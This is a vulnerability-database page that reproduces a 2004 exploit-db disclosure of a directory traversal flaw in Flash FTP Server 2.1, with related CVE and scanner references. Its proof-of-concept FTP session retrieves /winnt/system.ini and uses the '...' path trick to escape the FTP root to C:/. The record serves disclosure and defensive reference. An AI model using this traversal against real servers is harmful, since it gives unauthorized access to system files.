Lucene search
+L

Flash FTP Server - Directory Traversal

🗓️ 22 Jul 2004 00:00:00Reported by CoolICEType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 44 Views

Potential directory traversal vulnerability found in Flash FTP Server version 2.1 during testing.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2004-1783
10 May 200504:00
cve
cvelist
Cvelist
CVE-2004-1783
10 May 200504:00
cvelist
euvd
EUVD
EUVD-2004-1777
7 Oct 202500:30
euvd
nvd
NVD
CVE-2004-1783
31 Dec 200405:00
nvd
openvas
OpenVAS
Flash FTP Server Directory Traversal Vulnerability
3 Nov 200500:00
openvas
openvas
OpenVAS
Flash FTP Server Directory Traversal Vulnerability
3 Nov 200500:00
openvas
redhatcve
RedhatCVE
CVE-2004-1783
21 May 202522:01
redhatcve
TestCode:
C:\>ftp localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (server:(none)): CoolICE
331 Password required for CoolICE.
Password:
230 User CoolICE logged in.
ftp> get /winnt/system.ini
200 Port command successful.
150 Opening data connection for /winnt/system.ini.
226 File sent ok
ftp: 227 bytes received in 0.01Seconds 22.70Kbytes/sec
ftp>

--------------------------
C:\>ftp -d localhost
Connected to server.
220 Flash FTP Server v2.1 ready...
User (Server:(none)): anonymous
---> USER anonymous
331 Password required for anonymous.
Password:
---> PASS [email protected]
230 User anonymous logged in.
ftp> pwd
---> XPWD
257 "/C:/inetpub/ftproot/" is current directory.
ftp> cd /
---> CWD /
501 CWD failed. No permission
---> CWD ..
501 CWD failed. No permission
ftp> cd ...
---> CWD ...
250 CWD command successful. "C:/inetpub/ftproot/.../" is current directory.
ftp> cd /
---> CWD /
501 Cannot accept relative path using dot notation
ftp> pwd
---> XPWD
257 "/C:/" is current directory.

# milw0rm.com [2004-07-22]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jul 2004 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02773
44